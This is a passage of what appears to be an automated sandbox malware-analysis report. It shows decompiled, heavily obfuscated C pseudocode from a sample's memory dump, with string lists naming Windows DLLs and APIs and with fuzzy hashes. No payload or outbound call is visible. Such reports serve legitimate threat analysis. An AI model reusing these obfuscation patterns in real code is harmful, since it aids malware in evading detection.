                                                          				char _t33;
                                                          				char _t34;
                                                          				intOrPtr* _t36;
                                                          				intOrPtr _t37;
                                                          				char* _t38;
                                                          				intOrPtr _t40;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t43;
                                                          				char _t44;
                                                          				intOrPtr _t45;
                                                          				intOrPtr _t46;
                                                          				intOrPtr _t55;
                                                          				void* _t81;
                                                          				void* _t99;
                                                          				signed char _t103;
                                                          				signed int _t110;
                                                          				signed char _t113;
                                                          				signed int _t116;
                                                          				intOrPtr _t121;
                                                          				signed int _t122;
                                                          				void* _t127;
                                                          				short _t129;
                                                          				unsigned short _t131;
                                                          				unsigned short _t134;
                                                          				short _t137;
                                                          				signed int _t141;
                                                          				void* _t142;
                                                          				void* _t143;
                                                          
                                                          				_t33 = _a8;
                                                          				 *0x50845b =  *0x50845b + _t127;
                                                          				 *0x508583 = _t33;
                                                          				_t55 =  *0x50896b; // 0x0
                                                          				 *0x508bb3 =  *0x508bb3 - _t55;
                                                          				 *0x508cdf =  *0x508cdf + _t55;
                                                          				_v8 = _t33;
                                                          				 *0x50afe1 =  *0x50afe1 - _t33;
                                                          				_t34 = _v8;
                                                          				_push(_t34);
                                                          				 *0x50afe1 =  *0x50afe1 - _t34;
                                                          				_t134 = 0xffffffffff48ec14;
                                                          				 *0x50afe5 = _t34;
                                                          				if(_t34 >= 0) {
                                                          					 *0x508753 =  *0x508753 + _t48 - 0x73b54;
                                                          					_t34 =  *0x50899b;
                                                          					 *0x5080ea =  *0x5080ea +  !0x31a8e1;
                                                          					if(_t99 <= _t99) {
                                                          						_t99 = _t99 + 1;
                                                          					}
                                                          				}
                                                          				_t113 = 0x95fb;
                                                          				if(0x95da == 0) {
                                                          					 *0x508224 = 0x95fb;
                                                          					_t134 = _t134 - 0xbd67;
                                                          					 *0x50afe3 =  *0x50afe3 + _t34;
                                                          					 *0x508351 =  *0x508351 + _t134;
                                                          					 *0x50afe5 = _t34;
                                                          				}
                                                          				_pop(_t36);
                                                          				_t37 =  *_t36;
                                                          				 *0x508f9f = 0x3a9ae2;
                                                          				_t103 = (0x70a6 >> 0x70a6) + _t113;
                                                          				_v8280 = _t37;
                                                          				 *0x50afe6 = _t37;
                                                          				_t129 = 0x50afe5;
                                                          				if(_t37 <= 0xc3e) {
                                                          					 *0x50afd9 =  *0x50afd9 + _t37;
                                                          					 *0x508913 = _t37;
                                                          					 *0x5080f6 =  *0x5080f6 - 0xffffffffffffc560;
                                                          					 *0x50afdc =  *0x50afdc + 0xffffffffffffc560;
                                                          					_t103 = _t103 + _t103;
                                                          				}
                                                          				if(_t103 >= _t103) {
                                                          					L12:
                                                          					_t113 = 0x13c35;
                                                          					_t134 = (_t134 >> _t103) + (_t134 >> _t103) + (_t134 >> _t103) + (_t134 >> _t103);
                                                          					_t129 = 0;
                                                          					if(_t37 > 0) {
                                                          						 *0x508673 = _t37;
                                                          					}
                                                          					 *0x508caf = 0x2f45fb;
                                                          					_v8 = _v8 - _t103;
                                                          					goto L15;
                                                          				} else {
                                                          					_t103 = _t103 - 0x72bd;
                                                          					if(_t103 != _t103) {
                                                          						L15:
                                                          						_v8252 = 0;
                                                          						_v8 = _t37;
                                                          						 *0x508216 = _t113;
                                                          						_t38 = _v8;
                                                          						 *0x508a5f = _t38;
                                                          						_v12 = _t38;
                                                          						_t137 = _t129;
                                                          						_t131 = _t134;
                                                          						_t40 = _v12;
                                                          						_v8256 = 0;
                                                          						if((_t113 & 0x000000ac) == 0) {
                                                          							 *0x50835d =  *0x50835d - _t137;
                                                          							_t131 = 0xd745d5;
                                                          							 *0x50840b = _t40;
                                                          							if(_t40 >= 0x14) {
                                                          							}
                                                          							 *0x508146 = 0x74;
                                                          						}
                                                          						 *0x5081e4 = 0x82b0;
                                                          						_t116 =  *0x50821a; // 0x92c5
                                                          						 *0x508266 =  *0x508266 - 0xb1ff;
                                                          						_v8264 = 0;
                                                          						_t109 = 0x6f89ac;
                                                          						 *0x5081ea =  *0x5081ea + (_t116 | 0x00008ca9);
                                                          						 *0x50afe3 =  *0x50afe3 + _t40;
                                                          						_t42 = _t40;
                                                          						 *0x5081fe = 0x9226;
                                                          						_t121 =  *0x508232; // 0x9a66
                                                          						_v8276 = 0;
                                                          						_v8 = _t42;
                                                          						 *0x509a97 =  *0x509a97 + _t121;
                                                          						_t43 =  *0x50afe1; // -128
                                                          						 *0x508288 =  *0x508288 - 0xb1ff;
                                                          						_t141 = 0xbf + _t131;
                                                          						if(_t131 < 0) {
                                                          							 *0x50836b =  *0x50836b - _t43 + 0xf8;
                                                          							 *0x508138 = 0x6f89ac;
                                                          							_t109 =  *0x508170; // 0x2575
                                                          						}
                                                          						_t122 = _t121 - 0xa9;
                                                          						_t44 = _v8;
                                                          						_t81 = "tsbyuv.dll" - _t44;
                                                          						if(_t44 >= 0x249a2d) {
                                                          							L24:
                                                          							_t122 = 0x9a;
                                                          							 *0x50822a = 0;
                                                          							_t141 = _t141 ^ 0x0000b6bb;
                                                          							goto L25;
                                                          						} else {
                                                          							if((_t81 + 0x00000001 | 0x00000049) < (_t81 + 0x00000001 | 0x00000049)) {
                                                          								L25:
                                                          								_t134 = _t141 + 0xb20759;
                                                          								 *0x50afe5 = _t44;
                                                          								if(_v8280 != 1) {
                                                          									_t110 =  !_t109;
                                                          									_push(_t44);
                                                          									if(_t44 >= 0) {
                                                          										 *0x50ab28 =  *0x50ab28 + _t131;
                                                          									}
                                                          									_t45 =  *0x50afe6; // -97
                                                          									 *0x50afd8 =  *0x50afd8 - _t45;
                                                          									_pop(_t46);
                                                          									 *0x508204 = _t122;
                                                          									if((_t122 & 0x0092ed10) <= 0) {
                                                          										_t134 = _t134 + 0xa823d7;
                                                          									}
                                                          									_v8 = _t46;
                                                          									 *0x508192 = _t110;
                                                          									 *0x50822c = 0x97a7;
                                                          									_push(E004D522F);
                                                          									_t99 = E004C48BB;
                                                          									goto L1;
                                                          								}
                                                          								_v8 = _t44;
                                                          								_push(_t109);
                                                          								_push(_t109);
                                                          								_push(_t109);
                                                          								_push(0x4d3c66);
                                                          								_t109 = E00464241;
                                                          								goto __ecx;
                                                          							}
                                                          							_t109 = _t109 + 1;
                                                          							goto L24;
                                                          						}
                                                          					}
                                                          					goto L12;
                                                          				}
                                                          				L1:
                                                          				_push(_t142);
                                                          				_t142 = _t143;
                                                          				_t143 = _t143 + 0xfffffff4;
                                                          				_t48 =  &_v20;
                                                          				_v12 =  &_v20;
                                                          				_push(_v12);
                                                          				_push(E004C48DB);
                                                          				goto ( *0x50892b);
                                                          			}








































                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: B5d$EtwEventWriteStartScenario$RemoveClipboardFormatListener$RemoveVectoredExceptionHandler$WindowsCodecs.dll$ZwLoadKeyEx$tsbyuv.dll
                                                          • API String ID: 0-346616746
                                                          • Opcode ID: f93faa5925a4031faacf54fcacbeb45936be5d8250dc0b5ce807dc6edd9279d1
                                                          • Instruction ID: 81c64e18934f344d071f6ad680b9b21ec7efa0f80eceb16081ff0d3bc9b62132
                                                          • Opcode Fuzzy Hash: f93faa5925a4031faacf54fcacbeb45936be5d8250dc0b5ce807dc6edd9279d1
                                                          • Instruction Fuzzy Hash: 0A91E679A14742CFC700DF79EC94AED3BB0EB39324B04516BC888A7762EA750949E706
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 79%
                                                          			E004C6560(void* __ebx, void* __ecx, short __edx, unsigned int __edi, signed int __esi) {
                                                          				char _t34;
                                                          				char _t35;
                                                          				void* _t39;
                                                          				intOrPtr _t42;
                                                          				char _t47;
                                                          				signed char _t48;
                                                          				char _t50;
                                                          				void* _t53;
                                                          				signed char _t54;
                                                          				void* _t62;
                                                          				intOrPtr _t86;
                                                          				void* _t89;
                                                          				signed char _t106;
                                                          				signed char _t107;
                                                          				short _t110;
                                                          				signed char _t113;
                                                          				signed char _t125;
                                                          				intOrPtr _t126;
                                                          				intOrPtr _t135;
                                                          				unsigned short _t140;
                                                          				unsigned short _t142;
                                                          				void* _t144;
                                                          
                                                          				_t140 = __esi;
                                                          				_t136 = __edi;
                                                          				_t120 = __edx;
                                                          				_t34 =  *(_t144 - 8);
                                                          				_t62 = "CNHMWL.dll" + 0x405c - 0x5021;
                                                          				 *(_t144 - 8) = __ecx;
                                                          				if(__ecx > __ecx) {
                                                          					L3:
                                                          					 *0x50afdc =  *0x50afdc + _t62 + 0x31a3;
                                                          					_t106 = 0x68d3;
                                                          				} else {
                                                          					_t106 = _t144 - 8;
                                                          					 *0x5081c2 = __edx;
                                                          					_t135 =  *0x50820c; // 0x96b5
                                                          					_t120 = _t135 - 0x95a690;
                                                          					if((__esi & 0x0000b6a0) < 0) {
                                                          						_t136 = __edi + 1;
                                                          						 *0x50afe5 = _t34;
                                                          						_t62 = (0x92943 >> _t106) + _t34;
                                                          						goto L3;
                                                          					}
                                                          				}
                                                          				 *0x508192 = _t106;
                                                          				 *0x508210 = _t120 - 0xffffffffffff704a;
                                                          				 *0x50822c = _t140;
                                                          				 *((intOrPtr*)(_t144 - 0x20)) = _t34;
                                                          				 *(_t144 - 8) = _t34;
                                                          				 *0x509423 =  *0x509423 + _t106;
                                                          				 *0x50820e =  *0x50820e + 0x92;
                                                          				 *0x509c1b =  *0x509c1b;
                                                          				_t35 =  *(_t144 - 8);
                                                          				_push( *((intOrPtr*)(_t144 - 0x20)));
                                                          				_t125 = 0xa397;
                                                          				 *0x5086d1 =  *0x5086d1 + _t136;
                                                          				 *0x509d7f =  *0x509d7f + _t140;
                                                          				 *0x50afe1 = _t35;
                                                          				_t39 = _t35;
                                                          				if(_t136 < 0) {
                                                          				}
                                                          				 *0x50afe3 =  *0x50afe3 - _t39;
                                                          				_t42 = _t39;
                                                          				_push( *((intOrPtr*)(_t144 - 0x18)));
                                                          				_t107 = _t125;
                                                          				if((_t125 & 0x00008f26) <= 0) {
                                                          				}
                                                          				 *((intOrPtr*)(_t144 - 0xc)) = _t42;
                                                          				if(L004ACD1C(_t42 - _t42 + _t42 - _t42, _t107, _t125, _t136, _t140) != 8) {
                                                          					 *(_t144 - 8) = 0x319e1b;
                                                          					_t107 = _t125;
                                                          					_t125 = 0x8e0d;
                                                          				}
                                                          				_t47 = E004B323C( *((intOrPtr*)(_t144 - 0xc)), _t140);
                                                          				if(_t47 == 0) {
                                                          					 *0x5087cb = _t47;
                                                          					 *(_t144 - 8) = _t47;
                                                          					 *0x508144 = _t107;
                                                          					_t48 =  *(_t144 - 8);
                                                          					_t109 = _t107 + _t107 + 1;
                                                          					_t126 =  *0x508216; // 0x9a2d
                                                          					_t142 = _t140 - 0xa62f3d >> _t107 + _t107 + 1;
                                                          					if((_t48 & _t48) >= 0) {
                                                          						 *0x50afe6 = _t48;
                                                          					}
                                                          					 *(_t144 - 8) = _t48;
                                                          					E004AE02F(_t48, 0xb8d6b, _t109, _t126 + 0x8861ea, _t136, _t142, _t126 + 0x8861ea);
                                                          					_t50 =  *(_t144 - 8);
                                                          					 *0x5088e7 =  *0x5088e7 + _t50;
                                                          					if(0x171ad6 < 0x171ad6) {
                                                          						 *0x50810e =  *0x50810e + 0x171ad6;
                                                          					}
                                                          					_t110 =  *0x508178; // 0xffff
                                                          					 *0x50afe1 = _t50;
                                                          					 *(_t144 - 8) = _t50;
                                                          					 *0x508156 = _t110;
                                                          					return  *((intOrPtr*)(_t144 - 0x24));
                                                          				} else {
                                                          					if(_t47 > 0x10) {
                                                          						L15:
                                                          						_t125 = 0xa62d;
                                                          						_t140 = _t140 >> _t107;
                                                          						goto L16;
                                                          					} else {
                                                          						 *0x50afd9 =  *0x50afd9 + _t47;
                                                          						 *0x508ad7 = _t47;
                                                          						_t89 = 0x402f56;
                                                          						if(0x402f56 >= _t107) {
                                                          							L18:
                                                          							_t125 = 0x9774;
                                                          							 *0x50822a = 0x9774;
                                                          							_t89 = _t89 + _t47;
                                                          							_t140 = _t140 + 0xab3117;
                                                          							 *0x50afe5 = _t47;
                                                          						} else {
                                                          							if(_t107 < _t107) {
                                                          								_t107 = 0x7ec1;
                                                          								 *0x5081c0 = _t125;
                                                          								goto L15;
                                                          							}
                                                          							L16:
                                                          							_t136 = _t136 >> _t107;
                                                          							 *0x508783 = _t47;
                                                          							_t86 =  *0x5089cf; // 0x3710000
                                                          							_t89 =  !(_t86 - 0x30f4) +  !(_t86 - 0x30f4);
                                                          							if(_t107 + _t107 == _t107 + _t107) {
                                                          								goto L18;
                                                          							}
                                                          						}
                                                          					}
                                                          					_push( *((intOrPtr*)(_t144 - 0x18)));
                                                          					 *(_t144 - 8) = _t89;
                                                          					 *(_t144 - 8) = _t89;
                                                          					_t113 =  *0x508144; // 0x779d
                                                          					 *0x508196 = _t113 - 0x74;
                                                          					_t53 = _t47;
                                                          					 *(_t144 - 8) = _t53;
                                                          					_t54 =  *(_t144 - 8);
                                                          					L004BB1E9();
                                                          					_push(_t54);
                                                          					_push(0);
                                                          					_push(1);
                                                          					_push(_t140);
                                                          					_push(E004C67C8);
                                                          					_push(E004BE12C);
                                                          					return _t54;
                                                          				}
                                                          			}


























                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *^<$B5d$C)$CNHMWL.dll$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$RemoveClipboardFormatListener$tsbyuv.dll
                                                          • API String ID: 0-3402622854
                                                          • Opcode ID: fca71e418edadd488b00160e7d8a2ce755ad889d099f9dafa92e5627abffc055
                                                          • Instruction ID: 033d6f8f2a3dc0217f3f1176fd8236e4e969868ad09cf7dbb87bcd63d3e66f87
                                                          • Opcode Fuzzy Hash: fca71e418edadd488b00160e7d8a2ce755ad889d099f9dafa92e5627abffc055
                                                          • Instruction Fuzzy Hash: 38712579A447469FCB00EFB8EC50BDD3BB1EF39324B08416AC884D7366E6790549D719
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 16%
                                                          			E004EEAF6(void* __ebx, void* __ecx, void* __edx, void* __edi) {
                                                          				char* _v16;
                                                          				char* _v20;
                                                          				intOrPtr _v24;
                                                          				char _t13;
                                                          				intOrPtr _t25;
                                                          				intOrPtr _t39;
                                                          				char _t42;
                                                          				char* _t65;
                                                          				intOrPtr _t87;
                                                          				intOrPtr _t109;
                                                          				intOrPtr _t111;
                                                          				unsigned short _t118;
                                                          
                                                          				_t113 = __edi;
                                                          				_t79 = __ecx;
                                                          				_t13 =  *0x508573;
                                                          				 *0x508060 =  *0x508060 - _t13;
                                                          				 *0x50afe1 = _t13;
                                                          				 *0x50afe5 = _t13;
                                                          				 *0x50afe5 = _t13;
                                                          				 *0x50afda =  *0x50afda - __ebx;
                                                          				_t65 = __ebx - 0x39;
                                                          				_v16 = _t65;
                                                          				 *0x5081e0 = 0x88a6;
                                                          				 *0x50a686 =  *0x50a686 + 0x50afe3;
                                                          				_t120 = 0xea9d7e;
                                                          				_t25 =  *0x5083eb; // 0x7fb784a0
                                                          				 *0x50803c =  *0x50803c + _t25;
                                                          				if(_t25 < 0xb49e4) {
                                                          					L9:
                                                          					_v24 = _v24 - 0x3976ee;
                                                          					_t81 = _t79 - 0x61 + 0x5cd239;
                                                          					 *0x50818c = _t81;
                                                          					_t120 = _t120 - _t113;
                                                          					 *0x50afd8 = 0;
                                                          					goto L10;
                                                          				} else {
                                                          					 *0x50afda =  *0x50afda + _t65;
                                                          					_v20 = _t65;
                                                          					 *0x50afdd =  *0x50afdd - _v24;
                                                          					 *0x508146 =  *0x508146 + __ecx;
                                                          					if(0 != 0) {
                                                          						L11:
                                                          					} else {
                                                          						_t42 =  *0x50afe1; // -128
                                                          						 *0x50afe3 = _t42;
                                                          						_t118 = __edi + 0xd995 >> 0x82da;
                                                          						_v16 = 0xe256a;
                                                          						if(0 <= 0) {
                                                          							L7:
                                                          							 *0x50aa68 =  *0x50aa68 - _t118;
                                                          							_t113 = _t118 - 0xf7;
                                                          							goto L8;
                                                          						} else {
                                                          							_t81 = 0x7421;
                                                          							 *0x5081b8 = 0x130;
                                                          							 *0x509b8f =  *0x509b8f;
                                                          							_t120 = 0x1997b34;
                                                          							if(0xffffffffffffff32 > 0) {
                                                          								L10:
                                                          								 *0x50afdd =  *0x50afdd - _t81;
                                                          								goto L11;
                                                          							} else {
                                                          								_t113 = _t118 + _t118;
                                                          								if(_t113 >= 0x61760) {
                                                          									_v20 = "psxdllsvr.dll";
                                                          									if(0 >= 0x7421) {
                                                          										 *0x50816c = 0x5af27b;
                                                          										_t111 =  *0x5081ba; // 0x510c
                                                          										 *0x508206 = _t111 - 0x856008;
                                                          										_t120 = 0;
                                                          										 *0x50afe3 = 0xbf;
                                                          										goto L7;
                                                          									}
                                                          									L8:
                                                          									_t87 =  *0x50816e; // 0xfe20
                                                          									_t79 = _t87 - 0x7638;
                                                          									_t109 =  *0x508208; // 0xcbda
                                                          									 *0x509d03 =  *0x509d03 - _t109;
                                                          									 *0x50afe1 = "credssp.dll";
                                                          									_t25 = 0xd8;
                                                          									goto L9;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				 *0x50afe3 = 0xb2;
                                                          				_t39 =  *0x50afe3; // -68
                                                          				return _t39;
                                                          			}

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CNHMWL.dll$WcnEapAuthProxy.dll$api-ms-win-core-sysinfo-l1-1-0.dll$credssp.dll$psxdllsvr.dll$tsbyuv.dll$v9
                                                          • API String ID: 0-3726062485
                                                          • Opcode ID: 7702ea9b9ee6390fd48320498088f7d6678a2c176d0edb11103b8b6029925a23
                                                          • Instruction ID: b4cc7390207cf5d829ec20c4b467acbd4e96f6ef6c36d2225fb2fceb0149fe7c
                                                          • Opcode Fuzzy Hash: 7702ea9b9ee6390fd48320498088f7d6678a2c176d0edb11103b8b6029925a23
                                                          • Instruction Fuzzy Hash: B5513B6EA547834FC701DF79EC58ADD3BB2EB7A320304426A8895D77A2E634050FE751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: CryptDataHash
                                                          • String ID: EtwEventWriteStartScenario$G_3$PenIMC_v0400.dll$tsbyuv.dll
                                                          • API String ID: 4245837645-4064654828
                                                          • Opcode ID: 8f9755d861849df69b7d0bdbb4267d615db46671d1214a747bc0268c38bdbe25
                                                          • Instruction ID: aa6fada98bfcc48c0147b7c8f433f3947d95b6604434a5d3181bcbd7cf1eb662
                                                          • Opcode Fuzzy Hash: 8f9755d861849df69b7d0bdbb4267d615db46671d1214a747bc0268c38bdbe25
                                                          • Instruction Fuzzy Hash: 53219FB8A183869FCB01CFB4E8D5AEEBFB0EB39314F14546AD484D7352D2340A49D715
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 49%
                                                          			E004EB7A3(signed int __eax, void* __ebx, short __ecx, signed int __edx, void* __edi, void* __esi) {
                                                          				signed int _t26;
                                                          				signed int _t29;
                                                          				signed int _t33;
                                                          				signed int _t37;
                                                          				short _t74;
                                                          				unsigned short _t76;
                                                          				signed int _t82;
                                                          				short _t83;
                                                          				short _t85;
                                                          				void* _t90;
                                                          				void* _t93;
                                                          				void* _t96;
                                                          
                                                          				_t93 = __esi;
                                                          				_t90 = __edi;
                                                          				_t82 = __edx;
                                                          				_t74 = __ecx;
                                                          				 *(_t96 - 8) = __eax;
                                                          				_t26 =  *(_t96 - 8);
                                                          				 *(_t96 - 0x44) = _t26;
                                                          				if((__edx & 0x0000a9e5) < 0) {
                                                          					L5:
                                                          					_t74 = _t74 - 0x75f495;
                                                          					 *0x5081d0 =  *0x5081d0 - _t82;
                                                          					_t82 = _t82 + _t82;
                                                          					L6:
                                                          					_t83 = _t82 + _t82;
                                                          					 *0x50a4bb =  *0x50a4bb - _t93;
                                                          					_push( *(_t96 - 0x44));
                                                          					 *(_t96 - 8) = _t26;
                                                          					_t29 =  *(_t96 - 8);
                                                          					_t76 = 0x6612 >> 0x6612;
                                                          					if(0x6612 >> 0x6612 >= 0x6612 >> 0x6612) {
                                                          						 *0x509983 =  *0x509983 + 0x8d7e;
                                                          						_t83 =  *0x50823c; // 0x0
                                                          						 *0x508288 =  *0x508288 + _t93 - 0xbccc;
                                                          						 *0x50afe3 =  *0x50afe3 + _t29;
                                                          						if(_t29 > 0) {
                                                          							 *0x508377 = _t29;
                                                          						}
                                                          					}
                                                          					 *(_t96 - 8) = _t29;
                                                          					if(0x474463 == _t76) {
                                                          						_t76 =  *0x508170; // 0x2575
                                                          						 *0x5081c0 = _t83;
                                                          					}
                                                          					_push( *((intOrPtr*)(_t96 - 0x48)));
                                                          					_t33 =  *(_t96 - 8);
                                                          					 *(_t96 - 8) = _t33;
                                                          					 *(_t96 - 0xc) =  !_t33;
                                                          					_t85 = _t83 - 0xa1;
                                                          					_t37 =  *(_t96 - 8);
                                                          					if(0 >= 0x3bfc) {
                                                          						L16:
                                                          						 *0x50afe6 = _t37;
                                                          						goto L17;
                                                          					} else {
                                                          						if("RtlEthernetStringToAddressW" < "RtlEthernetStringToAddressW") {
                                                          							L15:
                                                          							 *0x5081e6 = _t85;
                                                          							 *0x50afe1 =  *0x50afe1 + _t37;
                                                          							goto L16;
                                                          						}
                                                          						if(0x7222 >> 0x7222 < 0x7222 >> 0x7222) {
                                                          							L17:
                                                          							_push(E004EB962);
                                                          							_push(E004C4AF4);
                                                          							return _t37;
                                                          						}
                                                          						goto L15;
                                                          					}
                                                          				}
                                                          				if(__esi >= 0) {
                                                          					 *0x50a9d6 =  *0x50a9d6 - __esi;
                                                          				}
                                                          				 *0x508010 =  *0x508010 + _t26;
                                                          				if( !(0xfd - _t26 + 0x1d05 - 1) <= 0x365041) {
                                                          					goto L6;
                                                          				} else {
                                                          					 *0x508148 = _t74;
                                                          					 *0x508166 = _t74;
                                                          					goto L5;
                                                          				}
                                                          			}

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AP6$RtlEthernetStringToAddressW$WindowsCodecs.dll$an,$credssp.dll$lprmonui.dll
                                                          • API String ID: 0-1858886497
                                                          • Opcode ID: d2f59f9fe6be3f744e39c27d75ebb10054f1b53990ae894ba509663b7daa92ef
                                                          • Instruction ID: bd803e6ab46253a478beaf4726cbe8730666319346302f184f56f664dc960ac5
                                                          • Opcode Fuzzy Hash: d2f59f9fe6be3f744e39c27d75ebb10054f1b53990ae894ba509663b7daa92ef
                                                          • Instruction Fuzzy Hash: 1641EF79B107468FCB00EF79E8A4ADD7BB0FF39320B08416AC884D7716E2350989E785
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 70%
                                                          			E004EDAAF(void* __ebx, void* __ecx, signed short __edx, signed int __edi, unsigned short __esi, void* __eflags) {
                                                          				intOrPtr _t26;
                                                          				char _t27;
                                                          				intOrPtr _t32;
                                                          				char _t33;
                                                          				intOrPtr _t35;
                                                          				intOrPtr* _t43;
                                                          				char _t44;
                                                          				intOrPtr _t45;
                                                          				intOrPtr _t46;
                                                          				char _t47;
                                                          				intOrPtr _t48;
                                                          				intOrPtr _t64;
                                                          				void* _t78;
                                                          				intOrPtr _t79;
                                                          				signed short _t85;
                                                          				void* _t92;
                                                          				void* _t96;
                                                          				short _t101;
                                                          				intOrPtr* _t103;
                                                          				intOrPtr _t104;
                                                          				signed int _t107;
                                                          				unsigned short _t110;
                                                          				signed short _t115;
                                                          				void* _t116;
                                                          
                                                          				_t110 = __esi;
                                                          				_t107 = __edi;
                                                          				_t85 = __edx;
                                                          				_t78 = __ecx;
                                                          				E004B6988(__ebx, __edx, __edi, __esi, __eflags, 1);
                                                          				_t26 =  *((intOrPtr*)(_t116 - 8));
                                                          				if( *((intOrPtr*)(_t116 - 0x18)) <= 0) {
                                                          					_push(_t85);
                                                          					 *0x5081c4 = _t85;
                                                          					_push(_t26);
                                                          					__eflags = _t26 - 0xad2d8;
                                                          					if(_t26 == 0xad2d8) {
                                                          						L16:
                                                          						 *0x50824c =  *0x50824c + _t110;
                                                          						_t110 = _t110 + _t110;
                                                          						_t27 =  *0x50afe3; // -68
                                                          						__eflags = _t110;
                                                          						if(_t110 >= 0) {
                                                          							 *0x50afe5 = _t27;
                                                          						}
                                                          						_t79 =  *0x508168; // 0xea80
                                                          						_t78 = _t79 - 0x7c8a;
                                                          						 *0x5081d2 = 0xa1df;
                                                          						__eflags = 0x9f;
                                                          						if(0x9f != 0) {
                                                          							 *0x508252 =  *0x508252 + _t110;
                                                          							__eflags =  *0x508252;
                                                          							goto L20;
                                                          						}
                                                          					} else {
                                                          						__eflags = "psxdllsvr.dll" - _t78;
                                                          						if("psxdllsvr.dll" < _t78) {
                                                          							 *0x5096c3 =  *0x5096c3 - 0x7290;
                                                          							__eflags =  *0x5096c3;
                                                          							 *0x5081cc = _t85;
                                                          							goto L16;
                                                          						}
                                                          					}
                                                          					__eflags = _t107;
                                                          					if(_t107 == 0) {
                                                          						 *0x50afe6 = 0xdf;
                                                          						__eflags = 0xdf;
                                                          					}
                                                          					_pop(_t87);
                                                          					_push(0);
                                                          					 *0x50822c =  *0x50822c + _t110;
                                                          					_pop(_t32);
                                                          					__eflags = _t107;
                                                          					if(_t107 < 0) {
                                                          						__eflags = 3 >> 0x7ea1;
                                                          					}
                                                          					 *((intOrPtr*)(_t116 - 8)) = _t32;
                                                          					 *0x50afe0 =  *0x50afe0 + 0x50af2f;
                                                          					__eflags = 0xa15e5e;
                                                          					_pop(_t92);
                                                          					_t33 =  *((intOrPtr*)(_t116 - 8));
                                                          					 *((char*)(_t116 - 0x19)) = _t33;
                                                          					 *0x50afe5 = _t33;
                                                          					 *0x50afe0 =  *0x50afe0 - 0x902b;
                                                          					 *0x50afe3 = _t33;
                                                          					 *((intOrPtr*)(_t116 - 8)) = _t33;
                                                          					_t35 =  *0x50afe3; // -68
                                                          					_t96 = _t92;
                                                          					_push(_t96);
                                                          					 *0x50998f =  *0x50998f - 0x8dc9;
                                                          					 *0x50828a =  *0x50828a - 0x50afe2;
                                                          					__eflags = 0xa15fc4;
                                                          					_push(1);
                                                          					_push(1);
                                                          					_push(0);
                                                          					_push(0x4edfae);
                                                          					_push(L004DAD9C);
                                                          					return _t35;
                                                          				} else {
                                                          					_t64 =  *0x5089b3; // 0x2304
                                                          					 *0x50afda =  *0x50afda - _t64;
                                                          					_push(_t26);
                                                          					_t115 = _t110 + 0xe0a3;
                                                          					_t43 =  *((intOrPtr*)(_t116 - 0x10));
                                                          					if((_t85 & 0x00785d17) < 0) {
                                                          						L5:
                                                          						 *0x50870b =  *0x50870b + _t107;
                                                          						 *0x5084b3 = _t43;
                                                          						goto L6;
                                                          					} else {
                                                          						if((_t85 & 0x00009ddb) < 0) {
                                                          							L9:
                                                          							 *0x508c63 = _t64;
                                                          						} else {
                                                          							 *0x50afe3 =  *0x50afe3 + 0xf4;
                                                          							if((__edi & _t115) >= 0) {
                                                          								if(__edi > 0) {
                                                          									goto L5;
                                                          								}
                                                          								L6:
                                                          								 *0x5086ab =  *0x5086ab + _t107;
                                                          								_t107 = 0xffffffffff22c38c;
                                                          							}
                                                          							if(_t43 < 0xb2f) {
                                                          								_t64 =  *0x5087c3 + 1;
                                                          								goto L9;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t44 =  *_t43;
                                                          					if(_t78 >= _t78) {
                                                          						_t78 = _t78 + 1;
                                                          						_t85 =  *0x5081fe; // 0xd63d
                                                          					}
                                                          					 *0x50afe1 = _t44;
                                                          					 *((intOrPtr*)(_t116 - 8)) = _t44;
                                                          					_t45 =  *((intOrPtr*)(_t116 - 8));
                                                          					 *0x508693 = _t45;
                                                          					 *((intOrPtr*)(_t116 - 8)) = _t45;
                                                          					_t46 =  *((intOrPtr*)(_t116 - 8));
                                                          					_t101 =  *((intOrPtr*)(_t116 - 0x14));
                                                          					 *0x508ccf = 0x301467;
                                                          					 *0x5081ea = _t101;
                                                          					 *0x50afe3 = _t46;
                                                          					_t103 = _t101;
                                                          					_t104 =  *_t103;
                                                          					_t47 = _t46 - _t104;
                                                          					 *0x50afe3 = _t47;
                                                          					_push(_t104);
                                                          					 *0x50afe1 = _t47;
                                                          					_push(_t47);
                                                          					_t48 =  *0x50afe3; // -68
                                                          					_push(1);
                                                          					_push(0x4edbd5);
                                                          					_push(E004AE02F);
                                                          					return _t48;
                                                          				}
                                                          			}




























                                                          Strings
                                                          Memory Dump Source
